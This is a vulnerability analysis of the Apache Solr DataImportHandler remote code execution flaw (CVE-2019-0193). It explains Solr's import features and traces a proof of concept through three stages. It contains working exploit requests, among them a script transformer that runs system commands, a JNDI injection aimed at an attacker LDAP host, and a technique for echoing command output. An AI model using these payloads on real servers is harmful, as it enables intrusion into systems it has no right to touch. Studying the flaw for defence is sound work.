Apache Solr DataImportHandler Remote Code Execution Vulnerability (CVE-2019-0193) Analysis

Many people are unsure how to analyze the Apache Solr DataImportHandler remote code execution vulnerability (CVE-2019-0193), so this article summarizes the cause of the vulnerability and walks through its analysis; I hope it helps you work through the problem.
Vulnerability overview
On August 1, 2019, Apache Solr issued an official advisory: when Debug mode is enabled, the Solr DataImport feature accepts a "dataConfig" parameter from the request. This parameter serves the same purpose as data-config.xml, but passing it in the request is convenient for debugging; Debug mode itself is also enabled through a request parameter. A malicious script can be embedded in the dataConfig parameter, resulting in remote code execution.
I handled the incident response for this vulnerability. The PoC constructed during the response was clumsy to use in practice: it required a database driver on the target, needed a connection to a database, and had no echo (no output returned in the response). New PoCs were then constructed step by step; after several rounds of upgrades, the final version passes the data directly in the request stream, with no database driver, no database connection, and with echo. Below is a record of the PoC upgrade process and some of the problems encountered. Thanks to @Badcode and @fnmsd for their help.
Test environment
The Solr-related environments involved in the analysis are as follows:
Solr-7.7.2
JDK 1.8.0_181
Related concepts
At first I did not look into the Solr materials carefully; I just skimmed the documentation to reproduce the vulnerability. At the time I also suspected the data could be echoed, so I started debugging and trying to construct an echo, without results. Later, when I saw the new PoC, I realized I had gone off debugging blindly before truly understanding the root cause of this vulnerability, so I went back through the Solr materials and documentation and sorted out the vulnerability-related concepts below.
Solr working mechanism
1. Solr is a wrapper around the Lucene toolkit that provides indexing functionality as a web service.
2. When a business system needs indexing functionality (building or querying an index), it only needs to issue an HTTP request and parse the returned data.
(1) Creating index data
According to the configuration file, searchable data is extracted and wrapped into various Fields; each set of Fields is packaged into a Document; the Document is then analyzed (each Field is tokenized), producing index entries that are written to the index store, while the Document itself is also written to a document store.
(2) Querying index data
The keywords are parsed (QueryParser) into a query condition (TermQuery); the search component (IndexSearcher) looks up matching document IDs in the index store, then fetches the document information from the document store by document ID.
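As a minimal sketch of this request/response model (the local address, core name test, and field names are assumptions for illustration):

```sh
# Index a document via the update handler, then query it back
curl -s 'http://localhost:8983/solr/test/update?commit=true' \
     -H 'Content-Type: application/json' \
     -d '[{"id":"1","title_s":"hello solr"}]'

curl -s 'http://localhost:8983/solr/test/select?q=title_s:hello'
```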
Solr DataImportHandler
Solr DataImportHandler can import data into the index store in batches. According to the Solr documentation, DataImportHandler provides the following capabilities (a minimal configuration sketch follows this list):
Read data residing in relational databases or text data
Read and index data from XML (over http or from files) according to the configuration
Aggregate data from multiple columns and tables according to the configuration to build Solr documents
Update Solr with these documents (updating the index, the document store, etc.)
Perform full imports according to the configuration (full-import: rebuilds the entire index on every run)
Detect inserted/updated fields and perform incremental imports (delta-import: imports only added or modified fields)
Schedule full-import and delta-import runs
Plug in any kind of data source (ftp, scp, etc.) and other user-chosen formats (JSON, CSV, etc.)
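A minimal sketch of how the pieces fit together (the core name test, the /dataimport handler path, and the URLs are assumptions; the handler must be registered in solrconfig.xml): a data-config tells DIH where to read data and how to map it to fields, and an HTTP request triggers the import.

```sh
# Hypothetical data-config.xml referenced by the /dataimport handler:
cat <<'EOF'
<dataConfig>
  <dataSource type="URLDataSource"/>
  <document>
    <entity name="item"
            processor="XPathEntityProcessor"
            url="http://example.com/items.xml"
            forEach="/items/item">
      <field column="id"      xpath="/items/item/id"/>
      <field column="title_s" xpath="/items/item/title"/>
    </entity>
  </document>
</dataConfig>
EOF

# Trigger a full import over HTTP:
curl -s 'http://localhost:8983/solr/test/dataimport?command=full-import'
```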
From the material I found and the description of DataImportHandler in the official documentation, my understanding of the general DataImport processing flow is as follows (only the main parts relevant to this vulnerability are drawn):
A few terms explained:
Core: an index library, which contains schema.xml/managed-schema. schema.xml is the traditional name of the schema file and can be edited manually by the user; managed-schema is the schema file name Solr uses by default, and it supports dynamic changes at run time. The data-config can be supplied as an XML file or passed in the request (via the dataConfig parameter when dataimport has Debug mode enabled).
Create a core from the command line
The -d parameter specifies the configuration template. Under Solr 7.7.2, the _default and sample_techproducts_configs templates are available.
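A sketch of the command (run from the Solr install directory; the core name mycore is an assumption):

```sh
# Create a core named "mycore" from the _default configset template
bin/solr create -c mycore -d _default
```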
Create a core from the web interface
At first I thought a core could not be created from the web interface. There is an Add Core button, but the core directory it creates is empty and unusable, with an error saying the configuration files cannot be found. The corresponding core directory must first be created under the solr directory before it can be added in the web interface. I then tried configuring an absolute path, which the web interface also accepts, but by default Solr does not allow configuration files outside the created core's directory to be used. If this switch is set to true, configuration files outside the core directory can be used:
Looking back later, I found in the Solr Guide 7.5 that a core can also be created through the configSet parameter, which can be set to _default or sample_techproducts_configs. The following indicates that creation succeeded. However, a core created this way has no conf directory; its configuration effectively links to the configSet template rather than using a copy of it:
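A sketch of that API call (host and core name are assumptions):

```sh
# Create a core via the CoreAdmin API, linking it to the _default configset
curl -s 'http://localhost:8983/solr/admin/cores?action=CREATE&name=test&configSet=_default'
```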
A core can be created either way, but to use the dataimport feature you still need to edit the solrconfig.xml configuration file. The vulnerability would be much easier to exploit if the configuration file could be changed through web requests to enable the dataimport feature.
schema.xml/managed-schema: defines the Fields associated with the data source and how Solr should handle each Field when building the index. You can open the schema.xml/managed-schema under a newly created core to view its contents (too long to paste here). Several elements are relevant to this vulnerability:
Field: the definition of a field, corresponding to a field of the data source.
name: the field's name
type: the field's type
indexed: whether the field is indexed
stored: whether the field is stored
multiValued: whether the field is multi-valued; a multi-valued field can hold several values

dynamicField: a dynamic field definition; the final stage of the PoC achieves echo through this. Dynamic fields allow convention over configuration: a field name is matched against a pattern, e.g. name="*_i" will match any field in dataConfig ending with _i (such as myid_i, z_i). Restriction: the glob-like pattern in the name attribute may have "*" only at the beginning or the end. The implication is that when dataConfig inserts data and a field turns out not to be defined in the schema, a matching dynamic field can be used as the field name under which the data is stored; an example appears in the PoC evolution later.
dataConfig: this configuration can be supplied via a file or passed in the request (the dataConfig parameter can be used when dataimport has Debug mode enabled). It describes how to fetch the data (query statements, URLs, etc.), what kind of data to read (columns of a relational database, fields of an XML document, etc.), and what to do with it (modify/add/delete, etc.). Solr builds an index for this data and saves it as Documents.
You need to know the following dataConfig elements for this vulnerability:

Transformer: each set of fields extracted by an entity can be used directly during indexing, modified, or used to create an entirely new set of fields; a transformer can even return multiple rows of data. Transformers must be configured at the entity level.
RegexTransformer: uses regular expressions to extract or manipulate values from fields (from the source)
ScriptTransformer: lets you write a transformer in JavaScript or any other scripting language supported by Java; this is what the vulnerability uses
DateFormatTransformer: parses date/time strings into java.util.Date instances
NumberFormatTransformer: parses numbers contained in a String
TemplateTransformer: overwrites or modifies any existing Solr field, or creates a new Solr field
HTMLStripTransformer: strips HTML from string fields
ClobTransformer: builds a String from a database Clob type
LogTransformer: logs data to the console/log

EntityProcessor: the entity processor
SqlEntityProcessor: the default processor when none is specified
XPathEntityProcessor: used when indexing XML-type data
FileListEntityProcessor: a simple entity processor that enumerates a list of files in the file system according to given conditions
CachedSqlEntityProcessor: an extension of SqlEntityProcessor
PlainTextEntityProcessor: reads everything in the data source into a single implicit field named "plainText"; the content is not parsed in any way, but transformers can be added as needed to manipulate the data in "plainText"
LineEntityProcessor: returns a field named "rawLine" for each line read; the content is not parsed in any way, but transformers can be added to manipulate the data in "rawLine" or create additional fields
SolrEntityProcessor: imports data from a different Solr instance or core

dataSource: the data source; the following types exist, each with its own properties
JdbcDataSource: a database source
URLDataSource: usually used together with XPathEntityProcessor; can fetch text data over file://, http://, ftp:// and other protocols
HttpDataSource: identical to URLDataSource, just a different name
FileDataSource: reads the data source from a disk file
FieldReaderDataSource: if a field contains XML, use this together with XPathEntityProcessor
ContentStreamDataSource: uses POST data as the data source; can be used with any EntityProcessor

Entity: an entity, which roughly amounts to wrapping the operations on a data source's data into a Java object, with fields mapped to object properties. On top of the default attributes, an entity for an xml/http data source can have the following attributes:
processor (required): the value must be "XPathEntityProcessor"
url (required): the URL used to invoke the REST API (can be templated); if the data source is a file, this must be the file location
stream (optional): set this to true if the XML is very large
forEach (required): the XPath expression that splits the records; if there are multiple record types, separate them with "|" (pipe); may be omitted if useSolrAddSchema is set to true
xsl (optional): used as a preprocessor to apply an XSL transformation; provide the full file-system path or a URL
useSolrAddSchema (optional): set to "true" if the XML fed into this processor has the same schema as Solr add XML; if true, no fields need to be declared
flatten (optional): if set to true, all text under a tag is extracted into one field, regardless of the tag name

A field of the entity can have the following attributes:
xpath (optional): the XPath expression mapping the field to a column in the record; may be omitted if the column does not come from the XML (e.g. a synthetic field created by a transformer); if the field is marked multi-valued in the schema and XPath finds multiple values in a given row, XPathEntityProcessor handles it automatically with no extra configuration
commonField: can be (true|false); if true, this field, once encountered in a record, is copied to subsequent records before the Solr document is created

The first stage of PoC evolution: database driver + outbound connection + no echo
According to the official advisory, DataImportHandler accepts the dataConfig parameter when Debug mode is enabled. This parameter serves the same purpose as data-config.xml but is convenient for debugging when Debug mode is on; Debug mode itself is enabled through a request parameter. A script can be embedded in the dataConfig parameter, and an example of ScriptTransformer can be found in the documentation:
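A sketch of such a ScriptTransformer configuration, following the pattern in the Solr reference guide (the query and field names are assumptions):

```sh
# dataConfig with an embedded JavaScript transformer; f1 is applied to each row
cat <<'EOF'
<dataConfig>
  <script><![CDATA[
    function f1(row) {
      row.put('message', 'Hello World!');
      return row;
    }
  ]]></script>
  <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://localhost/db" user="user" password="pass"/>
  <document>
    <entity name="e" query="select id from items" transformer="script:f1"/>
  </document>
</dataConfig>
EOF
```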
Since Java code can be executed inside the script, a PoC can be constructed (checking the relevant error messages in the logs helps diagnose problems while building the PoC). The database connection can point anywhere, so all of the database details are attacker-controlled; it can then be tested (the demonstration only uses 127.0.0.1):
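A sketch of the stage-one PoC request (it assumes a MySQL driver on the target classpath, a reachable MySQL server at the given address, and a core named test with the /dataimport handler registered; nothing is echoed back):

```sh
# Stage-1 PoC: the ScriptTransformer runs a command during the import
curl -s 'http://localhost:8983/solr/test/dataimport' \
  --data-urlencode 'command=full-import' \
  --data-urlencode 'debug=true' \
  --data-urlencode 'wt=json' \
  --data-urlencode 'dataConfig=<dataConfig>
  <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://127.0.0.1:3306/test" user="root" password="root"/>
  <script><![CDATA[
    function f1(row) {
      java.lang.Runtime.getRuntime().exec("touch /tmp/solr_poc");
      return row;
    }
  ]]></script>
  <document>
    <entity name="e" query="select 1 as id" transformer="script:f1"/>
  </document>
</dataConfig>'
```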
In the ScriptTransformer example you can see row.put, which suggests the data might be echoed back. Test it:
Only the id field is visible here; the value put into the name field does not show up, and no error is reported. Next, try putting the data into id:
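A sketch of the script body used for this echo attempt (the executed command is an assumption): the process output is read and written into a row field, and whether it shows up depends on which field receives it.

```sh
# Transformer body: run a command and put its output into a row field
cat <<'EOF'
function f1(row) {
  var cmd  = java.lang.Runtime.getRuntime().exec("id");
  var br   = new java.io.BufferedReader(
               new java.io.InputStreamReader(cmd.getInputStream()));
  var out  = "";
  var line = null;
  while ((line = br.readLine()) != null) { out += line; }
  row.put("id", out);       // echoed: "id" is defined in the schema
  // row.put("name", out);  // not echoed: "name" is not defined in the schema
  return row;
}
EOF
```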
Now the echo is visible. At first I did not understand why putting data into name did not work. Later, after seeing the stage-three PoC, I went back to the material and realized that dataConfig works together with the schema: the name field is not configured in the schema, while the id field is configured by default, so Solr puts the id field's data into the Document but drops the name field's. In the stage-three PoC, the name attribute of every Field ends with "_s". Searching further, I found that dynamicField can be configured in the schema file. The following are the dynamicFields configured by default:
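An illustrative excerpt of the default dynamicField entries in the _default configset's managed-schema (abbreviated; the exact list and types may vary by version):

```sh
# Excerpt, for reference, of default dynamicField definitions
cat <<'EOF'
<dynamicField name="*_i" type="pint"         indexed="true" stored="true"/>
<dynamicField name="*_s" type="string"       indexed="true" stored="true"/>
<dynamicField name="*_l" type="plong"        indexed="true" stored="true"/>
<dynamicField name="*_t" type="text_general" indexed="true" stored="true"/>
<dynamicField name="*_b" type="boolean"      indexed="true" stored="true"/>
EOF
```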
This kind of field was introduced in the related concepts above. Checking and testing it confirms that it works:
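A sketch of that test (host, core, and field name are assumptions): the script output goes into a _s-suffixed field, which the *_s dynamicField accepts, so the value comes back in the debug response.

```sh
curl -s 'http://localhost:8983/solr/test/dataimport' \
  --data-urlencode 'command=full-import' \
  --data-urlencode 'debug=true' \
  --data-urlencode 'wt=json' \
  --data-urlencode 'dataConfig=<dataConfig>
  <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://127.0.0.1:3306/test" user="root" password="root"/>
  <script><![CDATA[
    function f1(row) { row.put("result_s", "echo works"); return row; }
  ]]></script>
  <document>
    <entity name="e" query="select 1 as id" transformer="script:f1"/>
  </document>
</dataConfig>'
```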
As long as a field's name attribute in dataConfig matches a dynamicField pattern, Solr automatically adds it to the Document. If the schema configures a field with that exact name, the configured field takes precedence; otherwise the match falls back to dynamicField.
The second stage of PoC evolution: outbound connection + no echo
The documentation mentions that JdbcDataSource can use JNDI.
Test whether JNDI injection is possible:
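A sketch of that test (the LDAP address points at an attacker-controlled server and is an assumption; whether the lookup leads to code execution also depends on the target JDK's JNDI restrictions):

```sh
# Stage-2 PoC: JdbcDataSource resolves a JNDI name, triggering a JNDI/LDAP
# lookup toward an attacker server; no JDBC driver is needed on the target
curl -s 'http://localhost:8983/solr/test/dataimport' \
  --data-urlencode 'command=full-import' \
  --data-urlencode 'debug=true' \
  --data-urlencode 'dataConfig=<dataConfig>
  <dataSource type="JdbcDataSource"
              jndiName="ldap://attacker.example.com:1389/Exploit"
              user="" password=""/>
  <document>
    <entity name="e" query="select 1"/>
  </document>
</dataConfig>'
```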
Here is a JNDI + LDAP malicious demo. With this approach, the target's CLASSPATH no longer needs to contain a database driver.
The third stage of PoC evolution: no outbound connection + echo
The PoC at this stage comes from @fnmsd and uses ContentStreamDataSource, but the documentation does not describe how to use it. An example of its use can be found on Stack Overflow:
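A benign sketch of the ContentStreamDataSource pattern (names are assumptions): the dataConfig travels in the URL-encoded dataConfig query parameter, while the POST body itself becomes the data source, so no outbound connection is needed.

```sh
# dataConfig sent in the query string of
# POST /solr/<core>/dataimport?command=full-import&debug=true&dataConfig=...
cat <<'EOF'
<dataConfig>
  <dataSource type="ContentStreamDataSource" name="stream"/>
  <document>
    <entity name="e" processor="XPathEntityProcessor"
            forEach="/root/doc" dataSource="stream">
      <field column="id"      xpath="/root/doc/id"/>
      <field column="title_s" xpath="/root/doc/title"/>
    </entity>
  </document>
</dataConfig>
EOF

# Example POST body (Content-Type: text/xml); this is the actual data source:
cat <<'EOF'
<root><doc><id>1</id><title>from post body</title></doc></root>
EOF
```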
As noted in the related concepts, ContentStreamDataSource can take POST data as its data source; combined with the dynamicField technique from the first stage, this achieves echo.
Only a screenshot of the effect is shown; the specific PoC is not given:
Looking back at the other DataSource types later, URLDataSource/HttpDataSource can be used as well, and the documentation provides an example:
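A sketch of a URLDataSource-based dataConfig delivered the same way as the earlier PoCs (the served XML and its address are assumptions):

```sh
# The entity fetches XML over HTTP; ftp:// works the same way
curl -s 'http://localhost:8983/solr/test/dataimport' \
  --data-urlencode 'command=full-import' \
  --data-urlencode 'debug=true' \
  --data-urlencode 'dataConfig=<dataConfig>
  <dataSource type="URLDataSource"/>
  <document>
    <entity name="e" processor="XPathEntityProcessor"
            url="http://127.0.0.1:8000/data.xml"
            forEach="/root/doc">
      <field column="id"      xpath="/root/doc/id"/>
      <field column="title_s" xpath="/root/doc/title"/>
    </entity>
  </document>
</dataConfig>'
```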
Constructing a test confirms this is feasible as well; protocols such as http and ftp can be used.
This concludes the analysis of the Apache Solr DataImportHandler remote code execution vulnerability (CVE-2019-0193) and the evolution of its PoC; hopefully it clarifies both the root cause and the exploitation techniques involved. Thanks for reading.